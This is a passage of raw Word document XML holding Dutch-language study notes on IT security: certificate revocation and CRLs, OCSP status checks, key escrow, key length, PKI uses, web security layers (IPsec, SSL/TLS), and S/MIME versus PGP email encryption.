      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>B -&gt; zoekt certificaat van A op in DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A3CA6A" w14:textId="2E3AAE32" w:rsidR="00271108" w:rsidRDefault="00271108" w:rsidP="00271108">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>B -&gt; Controleert met Public Key van CA of dit de echte Public Key van A is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1B8E9C" w14:textId="084EDAA6" w:rsidR="00047DEA" w:rsidRDefault="00271108" w:rsidP="00271108">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Communicatie via Public Key Cryptografie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654E4F8E" w14:textId="60D69E3E" w:rsidR="00271108" w:rsidRDefault="00047DEA" w:rsidP="00047DEA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Intrekken van certificaat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24818D70" w14:textId="77777777" w:rsidR="00047DEA" w:rsidRDefault="00047DEA" w:rsidP="00047DEA"/>
    <w:p w14:paraId="191BBE28" w14:textId="358C934F" w:rsidR="00047DEA" w:rsidRDefault="00047DEA" w:rsidP="00047DEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Indien het certificaat niet meer integer is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1678DB95" w14:textId="1CF20863" w:rsidR="00047DEA" w:rsidRDefault="00047DEA" w:rsidP="00047DEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Private Key gecompromitteerd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C387BC9" w14:textId="4B274163" w:rsidR="00047DEA" w:rsidRDefault="00047DEA" w:rsidP="00047DEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Geldigheidsduur verlopen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C046109" w14:textId="77777777" w:rsidR="00047DEA" w:rsidRDefault="00047DEA" w:rsidP="00047DEA"/>
    <w:p w14:paraId="658E9210" w14:textId="25281F44" w:rsidR="00047DEA" w:rsidRDefault="00047DEA" w:rsidP="00047DEA">
      <w:r>
        <w:t>Het certificaat wordt uit de respository gehaald (revoke) en komt op de blacklist (</w:t>
      </w:r>
      <w:r w:rsidRPr="00925BE1">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>CRL</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29866D9E" w14:textId="0F443784" w:rsidR="00047DEA" w:rsidRDefault="00047DEA" w:rsidP="00047DEA">
      <w:r>
        <w:t>De intrekking wordt gepubliceerd door de CA!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F7D76C" w14:textId="77777777" w:rsidR="00925BE1" w:rsidRDefault="00925BE1" w:rsidP="00047DEA"/>
    <w:p w14:paraId="790FFF48" w14:textId="1642E57B" w:rsidR="00925BE1" w:rsidRDefault="00925BE1" w:rsidP="00925BE1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>OCSP (</w:t>
      </w:r>
      <w:r w:rsidRPr="00925BE1">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6A6CCA" w14:textId="77777777" w:rsidR="00925BE1" w:rsidRDefault="00925BE1" w:rsidP="00925BE1"/>
    <w:p w14:paraId="50DC3156" w14:textId="2D790BFA" w:rsidR="00925BE1" w:rsidRDefault="00925BE1" w:rsidP="00925BE1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Online Certificate Status Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ED1631" w14:textId="369624AF" w:rsidR="00925BE1" w:rsidRDefault="00925BE1" w:rsidP="00925BE1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>= Online controle van certificaat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BED7FD" w14:textId="1470EBB7" w:rsidR="00FC7F6E" w:rsidRDefault="00FC7F6E" w:rsidP="00925BE1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>= Status die je bv ziet in Google Chrome op een website die SSL gebruikt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410A6392" w14:textId="77777777" w:rsidR="00396CCA" w:rsidRDefault="00396CCA" w:rsidP="00396CCA"/>
    <w:p w14:paraId="141D1A2F" w14:textId="5D7B21E8" w:rsidR="00396CCA" w:rsidRDefault="00396CCA" w:rsidP="00396CCA">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D6AB8F1" wp14:editId="4C61261B">
            <wp:extent cx="2872061" cy="1670570"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="11" name="Picture 11" descr="../Desktop/Screen%20Shot%202016-06-10%20at%2020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6-10%20at%2020.35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05" cy="16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BBE5" w14:textId="77777777" w:rsidR="00396CCA" w:rsidRDefault="00396CCA" w:rsidP="00396CCA"/>
    <w:p w14:paraId="17CD35D0" w14:textId="390A294A" w:rsidR="00925BE1" w:rsidRDefault="00925BE1" w:rsidP="00925BE1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>B vraagt status op via OCSP server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35450BC2" w14:textId="77777777" w:rsidR="00671CD3" w:rsidRDefault="00FC7F6E" w:rsidP="00FC7F6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Good</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BCD2CC" w14:textId="34E0DBE2" w:rsidR="00FC7F6E" w:rsidRPr="00FC7F6E" w:rsidRDefault="00671CD3" w:rsidP="00671CD3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00671CD3">
        <w:t>Niet op CRL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A861E3E" w14:textId="77777777" w:rsidR="00671CD3" w:rsidRPr="00671CD3" w:rsidRDefault="00FC7F6E" w:rsidP="00FC7F6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Revoked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EFC588" w14:textId="06432245" w:rsidR="00FC7F6E" w:rsidRPr="00FC7F6E" w:rsidRDefault="00EA088C" w:rsidP="00671CD3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA088C">
        <w:t>CRL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31602EBD" w14:textId="53E453E4" w:rsidR="00671CD3" w:rsidRPr="00671CD3" w:rsidRDefault="00FC7F6E" w:rsidP="00671CD3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>Unknown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79733003" w14:textId="70C5D9B3" w:rsidR="00671CD3" w:rsidRDefault="00671CD3" w:rsidP="00671CD3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Onbekend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E37A728" w14:textId="77777777" w:rsidR="00A92165" w:rsidRDefault="00A92165" w:rsidP="00A92165"/>
    <w:p w14:paraId="60E58228" w14:textId="32862356" w:rsidR="00A92165" w:rsidRDefault="00A92165" w:rsidP="00A92165">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00A92165">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C87ACE5" wp14:editId="5C00A4C8">
            <wp:extent cx="5029200" cy="1971676"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="12" name="Picture 12" descr="https://access.redhat.com/documentation/en-US/Red_Hat_Certificate_System/8.1/html/Deploy_and_Install_Guide/images/ca-oc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access.redhat.com/documentation/en-US/Red_Hat_Certificate_System/8.1/html/Deploy_and_Install_Guide/images/ca-ocs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716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13C5497" w14:textId="24C5450C" w:rsidR="00A92165" w:rsidRDefault="00A92165" w:rsidP="00BD236F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Key Escrow (</w:t>
      </w:r>
      <w:r w:rsidRPr="00A92165">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F20BBDA" w14:textId="77777777" w:rsidR="008A00C4" w:rsidRDefault="008A00C4" w:rsidP="008A00C4"/>
    <w:p w14:paraId="45D34D39" w14:textId="30EDFD4C" w:rsidR="008A00C4" w:rsidRDefault="008A00C4" w:rsidP="008A00C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De VS ziet Cryptografie als een militair aspect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044B8034" w14:textId="1A867C9F" w:rsidR="00F61714" w:rsidRDefault="00F61714" w:rsidP="008A00C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>= Geen uitvoer van sterke crypto systemen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F820855" w14:textId="08904E68" w:rsidR="00F61714" w:rsidRDefault="00F61714" w:rsidP="008A00C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>= Zwak mag wel (korte sleutels)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3467AE23" w14:textId="1E863C96" w:rsidR="00F61714" w:rsidRDefault="00F61714" w:rsidP="008A00C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sterke crypto is soms toegestaan, maar private key moet je laten beheren door de CA (TTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231CAF85" w14:textId="1ECF13F8" w:rsidR="00F61714" w:rsidRDefault="00F61714" w:rsidP="008A00C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Op deze manier kunnen ze jouw communicatie bekijken (denk aan terrorisme)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B83022" w14:textId="324D9B11" w:rsidR="005A04E5" w:rsidRDefault="005A04E5" w:rsidP="008A00C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Key Escrow = Big Brother</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1B6710" w14:textId="4CA7DEB0" w:rsidR="005A04E5" w:rsidRDefault="005A04E5" w:rsidP="008A00C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>NOOIT je Private Key uit handen geven</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A744981" w14:textId="77777777" w:rsidR="00F607BC" w:rsidRDefault="00F607BC" w:rsidP="00F607BC"/>
    <w:p w14:paraId="42852B78" w14:textId="28CF5CEA" w:rsidR="00F607BC" w:rsidRDefault="00F607BC" w:rsidP="00F607BC">
      <w:r>
        <w:t>De sleutellengte bepaalt de veiligheid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E17197" w14:textId="58B45210" w:rsidR="00F607BC" w:rsidRDefault="00F607BC" w:rsidP="00F607BC">
      <w:r>
        <w:t>De lengte hoeft niet groot te zijn indien de sleutel maar een beperkte levensduur heeft.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362C332F" w14:textId="16895070" w:rsidR="00F607BC" w:rsidRDefault="00F607BC" w:rsidP="00F607BC">
      <w:pPr>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:r>
        <w:t>Er zijn tabellen die de sleutellengte aangeven om nog veilig te zijn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E081136" w14:textId="3ACF59E2" w:rsidR="00F607BC" w:rsidRDefault="00F607BC" w:rsidP="00F607BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uitgedrukt in MIPS Jaar = Million Instructions Per Second (Year in dit geval)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F360CC" w14:textId="77777777" w:rsidR="00A07086" w:rsidRDefault="00A07086" w:rsidP="00A07086"/>
    <w:p w14:paraId="6CBB39DC" w14:textId="74765D7D" w:rsidR="00A07086" w:rsidRDefault="004C6DC8" w:rsidP="004C6DC8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>PKI-voordelen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EC3FA5" w14:textId="77777777" w:rsidR="004C6DC8" w:rsidRDefault="004C6DC8" w:rsidP="004C6DC8"/>
    <w:p w14:paraId="795280E4" w14:textId="6F2069F9" w:rsidR="004C6DC8" w:rsidRDefault="004C6DC8" w:rsidP="004C6DC8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Secure E-mail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BED8A3B" w14:textId="4F035AC2" w:rsidR="004C6DC8" w:rsidRDefault="004C6DC8" w:rsidP="004C6DC8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Code Signing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DCE328" w14:textId="5DB6E0D8" w:rsidR="004C6DC8" w:rsidRDefault="004C6DC8" w:rsidP="004C6DC8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>VPN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBDAD87" w14:textId="30CF2171" w:rsidR="00234E6D" w:rsidRDefault="004C6DC8" w:rsidP="004C6DC8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Secure Single Sign-On</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B421290" w14:textId="3AA6706B" w:rsidR="004C6DC8" w:rsidRDefault="00234E6D" w:rsidP="00234E6D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:bookmarkStart w:id="9" w:name="_Toc453378498"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Web Security</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="1542B1A9" w14:textId="77777777" w:rsidR="00234E6D" w:rsidRDefault="00234E6D" w:rsidP="00234E6D"/>
    <w:p w14:paraId="1E33926A" w14:textId="53F8C283" w:rsidR="00234E6D" w:rsidRDefault="009D2FB2" w:rsidP="009D2FB2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Internet = kwetsbaar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A3F8F6" w14:textId="3E9403B8" w:rsidR="00776765" w:rsidRDefault="00776765" w:rsidP="00214337">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Client -&gt; Server -&gt; Client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5F81A9" w14:textId="352EF93B" w:rsidR="00776765" w:rsidRDefault="00776765" w:rsidP="00214337">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Soorten bedreigingen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFE05BE" w14:textId="5DB3829B" w:rsidR="00776765" w:rsidRDefault="00776765" w:rsidP="00776765">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Integrity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661C108B" w14:textId="69DFD02A" w:rsidR="00776765" w:rsidRDefault="00776765" w:rsidP="00776765">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Confidentiality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA6538B" w14:textId="574300F1" w:rsidR="00776765" w:rsidRDefault="00776765" w:rsidP="00776765">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Denial Of Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AC8F75" w14:textId="0D75777F" w:rsidR="001A51E7" w:rsidRDefault="00776765" w:rsidP="001A51E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Authenticatio</w:t>
      </w:r>
      <w:r w:rsidR="001A51E7">
        <w:t>n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2487EC00" w14:textId="3FCA67F7" w:rsidR="001A51E7" w:rsidRDefault="001A51E7" w:rsidP="001A51E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Beveiligsmethoden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E75FF27" w14:textId="3E886BC8" w:rsidR="001A51E7" w:rsidRDefault="001A51E7" w:rsidP="001A51E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>IPsec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3132DC98" w14:textId="074589FD" w:rsidR="001A51E7" w:rsidRDefault="001A51E7" w:rsidP="001A51E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Laag 3 = Netwerklaag in OSI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53033EAE" w14:textId="7AEC5BAF" w:rsidR="001A51E7" w:rsidRDefault="001A51E7" w:rsidP="001A51E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SSL/TLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CB6F6D" w14:textId="447E6B22" w:rsidR="001A51E7" w:rsidRDefault="001A51E7" w:rsidP="001A51E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Laag4 = Transportlaag in OSI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129BB7F1" w14:textId="58863F2F" w:rsidR="001A51E7" w:rsidRDefault="001A51E7" w:rsidP="001A51E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Toepassingsgebonden beveligingsservices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E0DC94" w14:textId="0D7B02D2" w:rsidR="001A51E7" w:rsidRDefault="001A51E7" w:rsidP="001A51E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Laag 7 = Applicatielaag in OSI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A95F508" w14:textId="77777777" w:rsidR="00FE200C" w:rsidRDefault="00FE200C" w:rsidP="00FE200C"/>
    <w:p w14:paraId="2DE3260A" w14:textId="7E371FFA" w:rsidR="00FE200C" w:rsidRDefault="00FE200C" w:rsidP="00FE200C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D2AB90" w14:textId="77777777" w:rsidR="00FE200C" w:rsidRDefault="00FE200C" w:rsidP="00FE200C"/>
    <w:p w14:paraId="640C82F6" w14:textId="2595EA5E" w:rsidR="00FE200C" w:rsidRDefault="00FE200C" w:rsidP="00FE200C">
      <w:r>
        <w:t>2 systemen om E-mail te encrypteren</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034CD9CA" w14:textId="0E8D3294" w:rsidR="00FE200C" w:rsidRPr="00E24CCF" w:rsidRDefault="00FE200C" w:rsidP="00FE200C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E24CCF">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>S/MIME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FDB81E" w14:textId="1B6A0CA8" w:rsidR="00FE200C" w:rsidRDefault="00FE200C" w:rsidP="00FE200C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Secure Multipurpose Internet Mail Extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B09D08" w14:textId="7A070ADF" w:rsidR="00FE200C" w:rsidRDefault="00FE200C" w:rsidP="00FE200C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Gebruikt certificaten uitgereikt door een CA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72852C72" w14:textId="7B38F7C8" w:rsidR="00FE200C" w:rsidRDefault="00FE200C" w:rsidP="00FE200C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Meestal web-based E-mail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DA0120" w14:textId="5F139870" w:rsidR="00FE200C" w:rsidRPr="00E24CCF" w:rsidRDefault="00FE200C" w:rsidP="00FE200C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E24CCF">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>PGP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E744F50" w14:textId="0DCBDB81" w:rsidR="00FE200C" w:rsidRDefault="00FE200C" w:rsidP="00FE200C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Pretty Good Privacy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5386ADB7" w14:textId="07FA2573" w:rsidR="00FE200C" w:rsidRDefault="00FE200C" w:rsidP="00FE200C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Gebruikt een Web-Of-Trust</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C31B45" w14:textId="70F1FD40" w:rsidR="00FE200C" w:rsidRDefault="00FE200C" w:rsidP="00FE200C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Als x aantal mensen die je kent een certificaat vertrouwen, vertrouw jij dit ook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8D70B9" w14:textId="2C647E1E" w:rsidR="00FE200C" w:rsidRDefault="00FE200C" w:rsidP="00FE200C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Vertrouwen = signen met je private key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2647056A" w14:textId="77777777" w:rsidR="00FE200C" w:rsidRDefault="00FE200C" w:rsidP="00FE200C"/>
    <w:p w14:paraId="21199826" w14:textId="26F5154F" w:rsidR="00385B9E" w:rsidRDefault="003069F7" w:rsidP="00FE200C">
      <w:r>
